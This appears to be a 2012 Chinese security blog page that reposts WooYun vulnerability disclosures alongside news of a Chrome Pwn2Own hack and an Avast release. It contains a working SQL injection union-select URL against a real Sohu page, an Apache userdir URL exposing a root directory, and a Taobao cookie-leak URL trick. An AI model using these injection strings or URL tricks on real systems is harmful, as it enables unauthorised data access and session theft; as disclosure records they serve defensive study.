详细说明:
http://card.money.sohu.com/yh/card_product.php?id=70
漏洞证明:
http://card.money.sohu.com/yh/card_product.php?id=70%20and%201=2%20union%20select%201,user(),3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2012年3月11日 星期日
Chrome 再次金身不保,少年黑客領走第二筆六萬美元獎金
繼被一名俄羅斯學生在2分鐘內繞過沙盒被破解之後,Chrome瀏覽器再次破相,這次得手的是一位代號為PinkiePie的少年黑客,他在此之前準備了一周多,結合了三個新的漏洞,在一台打了所有安全補丁運行Windows 7的Dell Inspiron筆記本電腦上利用最新版的Chrome穩定版獲得了完全的系統權限。PinkiePie因此獲得了第二筆6萬美元的大獎,當然獎金也是Google提供的。
from:http://www.guao.hk/posts/google-chrome-gets-hacked-again-this-time-by-a-teenager-another-60k-reward.html
from:http://www.guao.hk/posts/google-chrome-gets-hacked-again-this-time-by-a-teenager-another-60k-reward.html
2012年3月4日 星期日
Avast 7.0.1407 正式版
We have just released the final version of avast 7, version number 7.0.1407.
List of most important changes:
http://www.avast.com/en-us/release-history
Direct download links (before the partner sites get refreshed)
http://files.avast.com/iavs5x/avast_free_antivirus_setup.exe
http://files.avast.com/iavs5x/avast_pro_antivirus_setup.exe
http://files.avast.com/iavs5x/avast_internet_security_setup.exe
apache userdir漏洞
http://www.wooyun.org/bugs/wooyun-2010-03960
简要描述:
会泄漏主机配置信息,也可能由于配置不当导致敏感文件被下载
详细说明:
http://up.sohu.com/~root
淘寶某分站存在cookie洩漏問題
From: http://www.wooyun.org/bug.php?action=view&id;=3924
简要描述:
淘宝某分站存在cookie泄漏漏洞问题
详细说明:
淘日本随便找一个物品页面,然后加一个cookie就可以看到了。这些cookie信息和分配给客户端的字段一致。
漏洞证明:
随便找一个页面
http://mall.japan.taobao.com/item/spu/ss33329.htm
加入-cookie 成为。
http://mall.japan.taobao.com/item/spu/ss33329-cookie.htm
http://mall.japan.taobao.com/item/spu/ss33329.htm
加入-cookie 成为。
http://mall.japan.taobao.com/item/spu/ss33329-cookie.htm
訂閱:
文章 (Atom)